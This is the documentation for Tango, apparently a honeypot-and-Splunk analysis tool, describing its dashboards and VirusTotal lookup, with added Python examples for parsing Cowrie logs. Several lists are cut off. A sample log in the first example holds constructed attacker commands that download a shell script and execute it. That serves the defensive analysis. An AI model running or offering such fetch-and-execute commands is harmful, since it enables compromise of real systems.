Tango is a set of scripts and Splunk apps which help organizations and users quickly and easily deploy honeypots and then view the data and analysis of the attacker sessions.
/opt/splunk/etc/apps/tango/bin/
Requests can be found here: Kenneth Reitz Github.
$ cp -r /opt/splunk/etc/apps/hobbes3_dendrogram/appserver/static/ /opt/splunk/etc/apps/tango/appserver/static
var long_label = d.name
var short_label = d.name
There are a few things that should be noted before you install:
Once you enter the app, you'll be first taken to the "Attack Overview" portion of the app, which shows a broad overview of the attacks against your sensors. This includes Attempts vs. Successes, Latest Logins, Attackers logging into multiple locations, etc.
You'll notice at the top of the app, in the navigation pane, there are multiple categories of reports available to you, which include:
Below we will go through each section and describe some of the data available in each section.
This dashboard shows a broad overview of the attacks against your sensors. This includes Attempts vs. Successes, Latest Logins, Attackers logging into multiple locations, etc.
This is one of the most beneficial dashboards available in the app, since it actually shows you what the attacker is doing on your honeypot. At the top of the dashboard, you can see the most recent sessions along with a filter to select a particular sensor. Clicking on a session populates the panels below, which include the passwords attempted/accepted, the commands entered, any files downloaded during the session, and the raw logs for the session.
Using this dashboard, you can inquire about a certain IP and if seen in the app, you can get valuable information pertaining to that IP to include:
This series of dashboards contains some analytical information, including the percentage of sessions with interaction, the various SSH client versions seen, some environment details extracted from the session, and a Human vs. Bot Identification dashboard.
In this section, you are able to see various geographical data related to each session and attacker. There are currently three dashboards available:
We also include a map which includes the location of attackers seen.
Currently, this dashboard contains the top usernames and passwords seen being attempted by the attackers, as well as the top username/password combinations.
Starting at the top of this page, you can see the latest files downloaded by attackers, which includes the following:
Below that is the latest "Attempted" file downloads. This contains URLs that were seen in a session but have no corresponding SHA256 hash (a hash indicates a successful download). This can be due to a server error on the hosting website, an incorrect spelling of the file name, or the URL appearing elsewhere in the command, perhaps as an argument or as the target site of the malware.
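The "attempted vs. successful download" distinction above, and the "URL seen from multiple attackers" view in the Campaign section, as an added example (not Tango's own code). It runs over constructed Cowrie-style JSON events; the field names follow Cowrie's cowrie.command.input and cowrie.session.file_download events, and the sample IPs and URLs are made up.

```python
import json
import re
from collections import defaultdict

# Constructed sample events (not real captures). Field names follow Cowrie's
# cowrie.command.input and cowrie.session.file_download JSON events.
SAMPLE_LOG = """
{"eventid": "cowrie.command.input", "session": "a1", "src_ip": "198.51.100.7", "input": "wget http://example.net/x.sh; chmod +x x.sh; ./x.sh"}
{"eventid": "cowrie.session.file_download", "session": "a1", "src_ip": "198.51.100.7", "url": "http://example.net/x.sh", "shasum": "0000000000000000000000000000000000000000000000000000000000000001"}
{"eventid": "cowrie.command.input", "session": "b2", "src_ip": "203.0.113.9", "input": "curl -O http://example.org/bot.bin"}
{"eventid": "cowrie.command.input", "session": "b2", "src_ip": "203.0.113.9", "input": "wget http://example.net/x.sh"}
{"eventid": "cowrie.session.file_download", "session": "b2", "src_ip": "203.0.113.9", "url": "http://example.net/x.sh", "shasum": "0000000000000000000000000000000000000000000000000000000000000001"}
{"eventid": "cowrie.command.input", "session": "c3", "src_ip": "192.0.2.4", "input": "wget http://example.org/bot.bin"}
"""

# A URL inside a shell command ends at whitespace or a shell separator.
URL_RE = re.compile(r"https?://[^\s;|&'\"]+")

def _events(log_text):
    return [json.loads(line) for line in log_text.strip().splitlines()]

def classify_downloads(log_text):
    """Return (downloaded, attempted), each mapping URL -> set of session ids.
    A URL typed in a command counts as 'attempted' for that session unless the
    same session also has a file_download event for it carrying a SHA256."""
    seen = defaultdict(set)     # url -> sessions where it appeared in a command
    hashed = defaultdict(set)   # url -> sessions with a successful (hashed) download
    for ev in _events(log_text):
        if ev["eventid"] == "cowrie.command.input":
            for url in URL_RE.findall(ev["input"]):
                seen[url].add(ev["session"])
        elif ev["eventid"] == "cowrie.session.file_download" and ev.get("shasum"):
            hashed[ev["url"]].add(ev["session"])
    attempted = {}
    for url, sessions in seen.items():
        missing = sessions - hashed.get(url, set())
        if missing:
            attempted[url] = missing
    return dict(hashed), attempted

def shared_urls(log_text):
    """URLs seen in commands from more than one source IP (possible campaign)."""
    ips = defaultdict(set)
    for ev in _events(log_text):
        if ev["eventid"] == "cowrie.command.input":
            for url in URL_RE.findall(ev["input"]):
                ips[url].add(ev["src_ip"])
    return {url: srcs for url, srcs in ips.items() if len(srcs) > 1}
```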
Lastly, there is a panel in which you can look up a particular SHA256 hash of a previously downloaded file in VirusTotal to retrieve the following information:
Please note that the VirusTotal API is limited to 4 requests per minute. With that in mind, you can use this panel to quickly look up the file hashes seen in your sessions.
This "lookup" produces a local "cache" that is used by other dashboards, so it is useful to run lookups on any malware you see. This was created due to limitations in the VirusTotal API and will be used as a workaround for the time being.
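The rate-limit workaround described above (a local cache in front of a lookup throttled to 4 requests per minute), as an added example that is not Tango's own lookup code. It assumes the VirusTotal v2 file-report endpoint and a caller-supplied `fetch(url, params)` callable that returns the parsed JSON report, so the block itself makes no network calls; the cache file format is also this example's own.

```python
import json
import time
from collections import deque
from pathlib import Path

# Assumed VirusTotal v2 endpoint; the HTTP call itself is injected via `fetch`
# (e.g. lambda url, params: requests.get(url, params=params).json()).
VT_REPORT_URL = "https://www.virustotal.com/vtapi/v2/file/report"
MAX_PER_MINUTE = 4

class CachedVTLookup:
    def __init__(self, api_key, cache_file, fetch, clock=time.monotonic, sleep=time.sleep):
        self.api_key, self.cache_file = api_key, Path(cache_file)
        self.fetch, self.clock, self.sleep = fetch, clock, sleep
        # Local cache (hash -> summary) persisted as JSON; example format only.
        self.cache = json.loads(self.cache_file.read_text()) if self.cache_file.exists() else {}
        self.calls = deque()  # timestamps of requests made in the current window

    def _throttle(self):
        """Block until another request fits inside the 4-per-minute window."""
        now = self.clock()
        while self.calls and now - self.calls[0] >= 60:
            self.calls.popleft()
        if len(self.calls) >= MAX_PER_MINUTE:
            self.sleep(60 - (now - self.calls[0]))
            self.calls.popleft()
        self.calls.append(self.clock())

    def lookup(self, sha256):
        sha256 = sha256.lower()
        if sha256 in self.cache:  # cache hit: no API call, no quota consumed
            return self.cache[sha256]
        self._throttle()
        report = self.fetch(VT_REPORT_URL, {"apikey": self.api_key, "resource": sha256})
        summary = {"positives": report.get("positives", 0),
                   "total": report.get("total", 0),
                   "scan_date": report.get("scan_date")}
        self.cache[sha256] = summary
        self.cache_file.write_text(json.dumps(self.cache))  # persist for other dashboards
        return summary
```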
This dashboard shows the Top 10 Malware Signatures we've seen over time, as well as the most recent files confirmed as malware. It is populated from the VirusTotal local "cache" found on the File Analysis page. This dashboard also shows files that have been downloaded but produced no signatures in VirusTotal.
This set of reports gives you information on possible campaigns associated with your sessions. Currently this includes:
This section will continue to be developed to include other possible campaign attribution by looking at other TTPs associated with each session. This could include commands entered during each session and terminal variables (size, language, SSH keys, etc.). For now, we can see the URLs, domains, and filenames that have been seen being used by multiple attackers.
This dashboard currently includes reports on the following:
This dashboard provides a graphical representation of the malware downloaded onto each sensor by each attacker, along with the URL and SHASUM of the malware.
This page contains the necessary commands to run on a system to install a honeypot using scripts from the Tango repository.
In this dashboard, you are able to edit a few fields for your sensors. These fields are:
This dashboard provides geographical information pertaining to each sensor currently deployed. You will find the following information available to you in this dashboard:
This dashboard also provides you with a map populated with the locations of all your sensors deployed.
Lastly, this dashboard contains feeds which you can download and integrate with other network monitoring solutions, which will hopefully be automated in the future.
The feeds currently available are:
Version 2.1
Fixed permissions error and updated dashboards
Version 2.0
Now ships with UF 6.3.0
Uses Cowrie Honeypot instead of Kippo to enable better logging and bug fixes